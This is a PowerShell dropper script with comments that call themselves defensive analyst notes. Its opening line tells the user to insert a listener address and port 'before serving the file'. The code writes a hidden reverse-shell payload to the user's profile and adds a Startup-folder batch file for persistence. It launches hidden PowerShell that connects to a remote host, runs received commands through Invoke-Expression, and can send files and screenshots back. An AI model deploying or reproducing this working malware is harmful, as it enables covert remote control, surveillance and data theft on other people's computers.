# Replace '[LISTENER_ADDRESS]' with your listener's address, and '[LISTENER_PORT]' with your listener's port before serving the file.
#
# Analyst notes (defensive summary of what this dropper does). The two here-strings
# below are runtime data written to disk and are reproduced byte-for-byte.
#
# $pstr is the body of a second script that this file writes to disk and registers
# for autostart. That inner script:
#   - loops forever; each pass runs its body as a background job (Start-Job, which
#     spawns a child powershell process) that is waited on for at most 300 s and
#     then stopped, so the connection is torn down and re-established roughly
#     every five minutes;
#   - opens a plain TcpClient to [LISTENER_ADDRESS]:[LISTENER_PORT] with a
#     StreamWriter directly on the socket stream — no TLS, so the banner
#     "Shell access as user <name>." and the FILE_START/FILE_END markers cross
#     the wire in cleartext;
#   - writes a "> " prompt, reads one line from the socket, strips CR/LF and runs
#     the text with Invoke-Expression (iex), writing back the joined output or the
#     literal string "error";
#   - treats three inputs specially: "exit" closes the socket and throws into the
#     catch (10 s sleep, then a fresh job reconnects), "r" is skipped without
#     execution, and "rm-all" deletes the Startup .bat and ~/pspayload.ps1, closes
#     the socket and force-stops every powershell process (self-removal);
#   - defines helpers reachable through the shell: transfer (base64 of a file's
#     bytes between FILE_START/FILE_END markers), screenshot (all screens rendered
#     via System.Drawing to $env:USERPROFILE\q.png, transferred, then deleted) and
#     volume (wscript.shell SendKeys with chars 174/175 — presumably the
#     volume-down/up key codes; not confirmed here);
#   - on any exception sleeps 10 s before the outer while loop retries.
# Host artifacts: hidden ~\pspayload.ps1, psrunner.bat in the user's Startup
# folder, a transient %USERPROFILE%\q.png, and a hidden-window powershell launched
# by cmd.exe with Start-Job children. Network: periodic outbound TCP to one fixed
# host:port carrying the cleartext banner above. PowerShell script block logging
# would record each command passed to iex.
$pstr=@'
while($true){
$job=start-job -scriptblock {
function transfer($p){$a=[System.Convert]::ToBase64String([io.file]::ReadAllBytes("$p"));echo "`r`nFILE_START`r`n$a`r`nFILE_END"}
function screenshot(){Add-Type -AssemblyName System.Windows.Forms,System.Drawing;$s=[Windows.Forms.Screen]::AllScreens;$b=[Drawing.Rectangle]::FromLTRB(($s.Bounds.Left|Measure-Object -Minimum).Minimum,($s.Bounds.Top|Measure-Object -Minimum).Minimum,($s.Bounds.Right|Measure-Object -Maximum).Maximum,($s.Bounds.Bottom|Measure-Object -Maximum).Maximum);$i=New-Object System.Drawing.Bitmap([int]$b.width),([int]$b.height);$g=[Drawing.Graphics]::FromImage($i);$g.CopyFromScreen($b.Location,[Drawing.Point]::Empty,$b.size);$i.Save("$env:USERPROFILE\q.png");$g.Dispose();$i.Dispose();transfer("$env:USERPROFILE\q.png");rm -Force "$env:USERPROFILE\q.png"}
function volume($v){$sh = new-object -com wscript.shell;1..50|%{$sh.SendKeys([char]174)};1..$v|%{$sh.SendKeys([char]175)}}
try{
$socket = new-object System.Net.Sockets.TcpClient("[LISTENER_ADDRESS]", [LISTENER_PORT]);
if($socket -eq $null){throw}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.UTF8Encoding;
$writer.Write("Shell access as user $env:username.`r`n");
cd ~
do{
$writer.Write("> ");
$writer.Flush() ;
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
$out_split = $out -split " ";
if(!$out.equals("exit") -and !$out.equals("r") -and !$out.equals("rm-all")){
try{
$res = iex $out -ErrorAction Stop
$writer.Write($res -join "`r`n")
} catch {$writer.Write("error")}
$writer.Write("`r`n")
}
if($out.equals("rm-all")){
rm -Force "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\psrunner.bat"
rm -Force "~/pspayload.ps1"
$writer.close()
$socket.close()
stop-process -Force -name powershell
}
} While (!$out.equals("exit"))
$writer.close()
$socket.close()
throw
}catch {
sleep -Seconds 10
}
}
$job | wait-job -timeout 300
$job | stop-job
}
'@
# Drop the inner script into the user's profile as ASCII and set the Hidden attribute.
$pstr | set-content "~\pspayload.ps1" -Encoding Ascii
(get-item "~\pspayload.ps1").Attributes += 'Hidden'
# Per-user persistence: a .bat in the Startup folder under $env:appdata relaunches
# the payload with a hidden window at every logon; being a per-user location, this
# does not require elevation.
$cmdstr= @"
start "" "powershell" -windowstyle hidden "~\pspayload.ps1"
"@
$cmdstr | set-content "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\psrunner.bat" -Encoding Ascii
# Launch immediately, repeating until more than three powershell processes exist
# (the count presumably includes the process running this script and the job
# children spawned by the inner script).
do{
cmd.exe /c 'start "" "powershell" -windowstyle hidden "~\pspayload.ps1"'
}while((Get-Process powershell).length -le 3)